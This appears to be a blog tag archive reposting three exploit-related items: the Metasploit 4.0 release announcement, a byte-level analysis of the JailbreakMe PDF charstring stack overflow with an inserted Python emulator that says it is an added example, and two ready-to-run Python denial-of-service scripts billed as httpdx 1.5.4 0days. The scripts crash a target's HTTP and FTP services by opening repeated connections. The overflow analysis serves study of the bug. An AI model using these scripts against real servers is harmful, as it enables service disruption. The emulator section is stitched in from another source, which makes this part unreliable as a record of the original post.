5 posts tagged 'Exploit'

  1. 2011.08.02 Metasploit Framework 4.0 Released!
  2. 2011.02.21 More about the JailbreakMe PDF exploit
  3. 2010.08.19 Multiple Denial of Service Vulnerabilities
2011. 8. 2. 18:42

Metasploit Framework 4.0 Released!

It's been a long road to 4.0. The first 3.0 release was almost 5 years ago and the first release under the Rapid7 banner was almost 2 years ago. Since then, Metasploit has really spread its wings. When 3.0 was released, it was under a EULA-like license with specific restrictions against using it in commercial products. Over time, the reasons for that decision became less important and the need for more flexibility came to the fore; in 2008, we released Metasploit 3.2 under a 3-clause BSD license. Licensing is definitely not the only place Metasploit's flexibility has increased. Over the last 5 years, we've added support for myriad exploitation techniques, network protocols, automation capabilities, and even user interfaces. The venerable msfweb is gone along with the old gtk-based msfgui. Taking their place are the newer java-based msfgui and armitage, both of which have improved by leaps and bounds since their respective introductions.

Five years ago, every exploitation tool out there was focused on running an exploit and getting a shell (usually a crappy cmd.exe shell, at that). Today, Metasploit encompasses every aspect of a penetration test. Dozens of auxiliary modules assist with reconnaissance, more than two hundred others help with information gathering and discovery; hundreds of exploits get you a toe-hold on the network; and the newest addition to the module family, post modules, help simplify and automate increasing your access. All of the data you gather can be stored in a database. For high-quality reporting and even greater automation, Metasploit Pro rounds out an engagement. Five years ago, Metasploit had already come a long way in making exploit development easier, but the widespread adoption of DEP and ASLR has pushed the project even further toward accelerating what has now become a much more difficult process.


All of that leads us to the Metasploit Framework version 4.0, released today.


To make the awesomeness of 4.0 stand out visually from its predecessors, we've built an array of stunning new ASCII art banners. My favorite, of course, is this one:


In addition to the visual differences, Metasploit Framework 4.0 comes with an abundance of new features and bug fixes. Contributor TheLightCosine continues with his onslaught of password-stealing post modules and another contributor, Silent Dream, has begun helping out in that arena as well. Other post modules have seen considerable improvement and expansion thanks to Carlos Perez. The recent Exploit Bounty netted a total of six new exploit modules, and other development added another 14 since the last release.


Adding to Metasploit's extensive payload support, Windows and Java Meterpreter now both support staging over http and Windows can use https. In a similar vein, POSIX Meterpreter is seeing some new development again. The last developer left it with little documentation on how to build it, so getting it to compile was a hurdle that we put off for too long. Now that it compiles, you can expect a more flexible payload for Linux. It still isn't perfect nor is it nearly as complete as the windows version, but many features already work.


Another flexibility improvement comes in the form of a consolidated pcap interface. The pcaprub extension ships with the Linux installers as of this release and support for Windows will come soon. Modules that used Racket for generating raw packets have been converted to Packetfu, which provides a smoother API for modules to capture and inject packets. As always, you can get the latest version from http://www.metasploit.com/download/ and full details of this release can be found in the Release Notes.


Everyone on the Metasploit team is proud of the first major version bump in half a decade. May it bring you many shells.



Source: Metasploit Blog

2011. 2. 21. 19:40

More about the JailbreakMe PDF exploit

The source code of the Jailbreakme exploit was released today, so maybe this explanation comes a bit late. In the update to the previous post on this subject I knew that I was right about the overflow in the argument stack when parsing the charstrings in the Type 2 format, so here is a little more info.

After decoding the stream of object 13 (of this file) we can see the following bytes:

The selected bytes are the important ones for this exploit, because the overflow occurs while parsing them. As mentioned, the Type 2 format is composed of operands, operators and numbers, and uses a stack to push and pop values. This stack has a maximum size of 48 elements. The following tips help make sense of these bytes:

  • The 0xFF byte means that the next 4 bytes are interpreted as a 32-bit two's-complement number that is pushed onto the stack.
  • 0x0C17 is the random operator, which returns a pseudo-random number greater than zero and less than or equal to one. It takes no argument from the stack.
  • The operator 0x0C04 is an or that takes two arguments from the stack and pushes 0 if both arguments are zero and 1 otherwise.
  • 0x0C1D is the index operator, which takes an argument num from the stack and pushes a copy of the element at position num of the stack (counted from the top) onto it.
  • The drop operator is encoded as the bytes 0x0C12 and removes the top element of the stack.

From the point of view of stack modification, the bytes can be split into four groups of "instructions":

  • 0xFFXXXXXXXX (45*5 bytes): pushes XXXXXXXX onto the stack. The number of these "instructions" is limited by the size of the argument stack, which is checked in this case, so the maximum we can push this way is 45.
  • 0x0C170C170C040C1D (20*8 bytes): pushes the stack element at position 1 (one position below the top element) onto the stack. The position is always 1 because the random values pushed are always non-zero, so the or operator always yields 1. In this case the value pushed is 0x00C00000.
  • 0x0C170C1D (170*4 bytes): pushes the element at the position given by the random number. The random number always fits in 16 bits, so after a 16-bit right shift it becomes 0 and the value pushed is always the top of the stack, 0x00C00000.
  • 0x0C1D0C12 (42*4 bytes): index takes 0x00C00000 (0xC0 after the shift) from the top of the stack and pushes the element at position 0xC0; drop then removes it. The first "instruction" of this type pushes F00DF00D (the 4th from last number pushed with FF), and the following ones write the 41 numbers before it into the stack.

These "instructions", except the FF one, don't check whether the stack is full before pushing values, so after parsing and executing them the stack looks similar to this image, the maximum size of the stack being 48*4 bytes:

After the last 0x0C12 an FF "instruction" is executed; it checks the stack size and returns from the function with an error code. Successful exploitation depends on the program and the architecture parsing the PDF file. As you know, this affects Apple products (now patched) and Foxit Reader. In the case of the latter it can be exploited easily through a SEH overflow, placing the shellcode in the bytes pushed by the FF "instructions". That gives more than 100 bytes for it, depending on the SEH position; in any case we can jump from there to the rest of the decoded stream and really do what we want.
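The stack arithmetic above can be checked with a small emulator. The following Python is an added example, not code from eternal-todo, from the Jailbreakme exploit or from any real charstring parser. It models only the five operators used here, keeps stack values as raw 16.16 fixed-point words whose integer part feeds index, makes random deterministic (0.5, i.e. 0x00008000, an assumption so the run repeats), and rebuilds the four instruction groups with constructed filler words (0x41414141 where the real file carries shellcode). With check_every_push=False only the 0xFF push is bounds-checked, as described; with True every push is.

```python
"""Toy emulator for the Type 2 charstring argument stack, restricted to the
operators used by the sequence discussed above.  Added example: it is not
the exploit and not the code of any real parser."""
import struct

MAX_STACK = 48                  # Type 2 argument stack limit (48 elements)
FIXED_ONE = 0x00010000          # 1.0 as a 16.16 fixed-point word
# Escape (0x0C xx) operators used by the sequence
OP_OR, OP_DROP, OP_RANDOM, OP_INDEX = 0x04, 0x12, 0x17, 0x1D


class StackOverflow(Exception):
    pass


def run_charstring(data, check_every_push, random_word=0x00008000):
    """Execute `data` and return (stack, max_depth, overflow_writes, error).

    check_every_push=False models the buggy parser: only the 0xFF number
    push checks the 48-element limit, the other pushes are unchecked, so
    the Python list keeps growing where the C array would be overrun.
    Every push that lands beyond slot 47 is recorded in overflow_writes as
    (slot, value).  check_every_push=True is the corrected behaviour.
    random() is fixed to 0.5 (0x00008000 in 16.16, an assumption) so the
    run is repeatable; the real operator returns any value in (0, 1].
    """
    stack, max_depth, overflow_writes = [], 0, []

    def push(word, checked):
        nonlocal max_depth
        if (checked or check_every_push) and len(stack) >= MAX_STACK:
            raise StackOverflow("push refused: %d elements on the stack" % len(stack))
        if len(stack) >= MAX_STACK:
            overflow_writes.append((len(stack), word))
        stack.append(word)
        max_depth = max(max_depth, len(stack))

    pos = 0
    try:
        while pos < len(data):
            b = data[pos]
            pos += 1
            if b == 0xFF:                       # 32-bit number: the only checked push
                (word,) = struct.unpack(">I", data[pos:pos + 4])
                pos += 4
                push(word, checked=True)
            elif b == 0x0C:
                op = data[pos]
                pos += 1
                if op == OP_RANDOM:             # pushes a value in (0, 1]
                    push(random_word, checked=False)
                elif op == OP_OR:               # 0 only if both operands are 0
                    a, c = stack.pop(), stack.pop()
                    push(0 if a == 0 and c == 0 else FIXED_ONE, checked=False)
                elif op == OP_INDEX:            # copy the i-th element below the top
                    word = stack.pop()
                    i = 0 if word & 0x80000000 else word >> 16   # integer part; negative -> top
                    if i >= len(stack):
                        raise ValueError("index %d reads outside the stack" % i)
                    push(stack[-1 - i], checked=False)
                elif op == OP_DROP:
                    stack.pop()
                else:
                    raise ValueError("operator 12 %d not modelled" % op)
            else:
                raise ValueError("byte 0x%02x not modelled" % b)
    except StackOverflow as exc:
        return stack, max_depth, overflow_writes, str(exc)
    return stack, max_depth, overflow_writes, None


def build_charstring():
    """Rebuild the four instruction groups described above (constructed
    input, not the bytes of the real file)."""
    numbers = [0x41414141] * 45                 # filler where the real file carries shellcode
    numbers[41] = 0xF00DF00D                    # 4th from last number pushed
    numbers[43] = numbers[44] = 0x00C00000      # 192.0 in 16.16: the index used by group 4
    cs = b"".join(b"\xFF" + struct.pack(">I", n) for n in numbers)          # 45 * 5 bytes
    cs += bytes([0x0C, OP_RANDOM, 0x0C, OP_RANDOM, 0x0C, OP_OR, 0x0C, OP_INDEX]) * 20
    cs += bytes([0x0C, OP_RANDOM, 0x0C, OP_INDEX]) * 170
    cs += bytes([0x0C, OP_INDEX, 0x0C, OP_DROP]) * 42
    cs += b"\xFF" + struct.pack(">I", 0x41414141)   # the final, checked push that fails
    return cs


def overflow_bytes(max_depth):
    """Bytes written past the end of a 48 * 4 byte stack buffer."""
    return max(0, max_depth - MAX_STACK) * 4


if __name__ == "__main__":
    for fixed in (False, True):
        stack, depth, writes, err = run_charstring(build_charstring(), check_every_push=fixed)
        print("check_every_push=%s: max depth %d, %d bytes past the buffer, "
              "%d unchecked writes, error: %s"
              % (fixed, depth, overflow_bytes(depth), len(writes), err))
```

In the unchecked run the stack peaks at 235 elements (187 slots, 748 bytes, past a 48-slot buffer), F00DF00D is copied into slot 234 by the first index/drop pair, and only the final FF push is refused, which is exactly the point at which the real parser returns its error code. With every push checked, the run stops during the second instruction group, at 48 elements, before anything is written past the buffer.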

Source: http://eternal-todo.com

2010. 8. 19. 10:53

Multiple Denial of Service Vulnerabilities

#!/usr/bin/env python

###########################################################################
#
# Title:    httpdx v1.5.4 Remote HTTP Server DoS (0day)
# By:       Dr_IDE
# Tested:   XPSP3
# Download: http://httpdx.sourceforge.net
# Note:     Server will totally crash if only running the EXE
# Note:     Get a "ffs what happened?" message if running via BAT
#
############################################################################
#
# Debugging Notes: This may not be exploitable as it dumps on a read operation.
# Upon crash throws: Access violation when reading [00001238]
#
############################################################################

import socket
import sys

if len(sys.argv) != 2:
    sys.exit("usage: %s <target host>" % sys.argv[0])

# A plain GET; the crash comes from the burst of short-lived connections,
# not from anything special in the request.
payload = b"GET / HTTP/1.1\r\n\r\n"
x = 1

try:
    while x < 2048:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        print("[*] Connecting to httpdx server.")
        s.connect((sys.argv[1], 80))
        print("\n[*] Sending command.\n")
        s.send(payload)
        s.close()
        x = x + 1

except socket.error:
    # A failed connect is taken as the server having gone away
    # (a refused connection on the very first attempt prints this too).
    print("[*] Success! We crashed the server in %d attempts." % x)
    print("[i] [pocoftheday.blogspot.com]")

  
=====================================================================================
  
#!/usr/bin/env python

###########################################################################
#
# Title:    httpdx v1.5.4 Remote FTP Server DoS (0day)
# By:       Dr_IDE
# Tested:   XPSP3
# Download: http://httpdx.sourceforge.net
# Note:     Server will totally crash if only running the EXE
# Note:     Get a "ffs what happened?" message if running via BAT
#
############################################################################
#
# Debugging Notes: This may be exploitable as it dumps on a write operation.
# Upon crash throws: Access violation when writing to [00230000]
#
############################################################################

import socket
import sys

if len(sys.argv) != 2:
    sys.exit("usage: %s <target host>" % sys.argv[0])

# A plain anonymous login; as with the HTTP case, the burst of short-lived
# connections is what brings the server down.
payload = b"USER anonymous\r\n\r\n"
x = 1

try:
    while x < 2048:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        print("[*] Connecting to httpdx server.")
        s.connect((sys.argv[1], 21))
        print("\n[*] Sending command.\n")
        s.send(payload)
        s.close()
        x = x + 1

except socket.error:
    # A failed connect is taken as the server having gone away
    # (a refused connection on the very first attempt prints this too).
    print("[*] Success! We crashed the server in %d attempts." % x)
    print("[i] [pocoftheday.blogspot.com]")


Source: exploit-db.com
